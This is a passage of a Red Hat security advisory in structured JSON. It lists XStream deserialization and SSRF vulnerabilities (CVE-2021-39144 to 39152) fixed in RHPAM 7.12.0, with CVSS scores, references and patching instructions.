"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*"
},
{
"cve": "CVE-2021-39144",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997772"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.*",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\nThis version of XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security\n\nFor more information, please refer to the [Red Hat solution Article](https://access.redhat.com/solutions/7002450) explaining this issue.\n\nOpenShift Logging\u0027s Elasticsearch 6.8.1 using opendistro_security v0.10.1.2 is not affected by the vulnerable code because com.thoughtworks.xstream is only a build-time dependency.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39144"
},
{
"category": "external",
"summary": "RHBZ#1997772",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997772"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39144",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39144"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39144",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39144"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-03-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.*"
},
{
"cve": "CVE-2021-39145",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997775"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39145"
},
{
"category": "external",
"summary": "RHBZ#1997775",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997775"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39145",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39145"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39145",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39145"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-8jrj-525p-826v",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-8jrj-525p-826v"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration"
},
{
"cve": "CVE-2021-39146",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997777"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39146"
},
{
"category": "external",
"summary": "RHBZ#1997777",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997777"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39146",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39146"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39146",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39146"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue"
},
{
"cve": "CVE-2021-39147",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997779"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39147"
},
{
"category": "external",
"summary": "RHBZ#1997779",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997779"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39147",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39147"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39147",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39147"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-h7v4-7xg3-hxcc",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-h7v4-7xg3-hxcc"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration"
},
{
"cve": "CVE-2021-39148",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997781"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39148"
},
{
"category": "external",
"summary": "RHBZ#1997781",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997781"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39148",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39148"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39148",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39148"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-qrx8-8545-4wg2",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-qrx8-8545-4wg2"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator"
},
{
"cve": "CVE-2021-39149",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997784"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.*",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39149"
},
{
"category": "external",
"summary": "RHBZ#1997784",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997784"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39149",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39149"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39149",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39149"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.*"
},
{
"cve": "CVE-2021-39150",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997786"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to request data from internal resources that are not publicly available by manipulating the processed input stream with Java runtime versions 14 to 8. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. If you rely on XStream\u0027s default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39150"
},
{
"category": "external",
"summary": "RHBZ#1997786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997786"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39150",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39150"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39150",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39150"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-cxfm-5m4g-x7xp",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-cxfm-5m4g-x7xp"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*"
},
{
"cve": "CVE-2021-39151",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997791"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\n\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39151"
},
{
"category": "external",
"summary": "RHBZ#1997791",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997791"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39151",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39151"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39151",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39151"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-hph2-m3g5-xxv4",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-hph2-m3g5-xxv4"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration"
},
{
"cve": "CVE-2021-39152",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997793"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to request data from internal resources that are not publicly available by manipulating the processed input stream with Java runtime versions 14 to 8. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
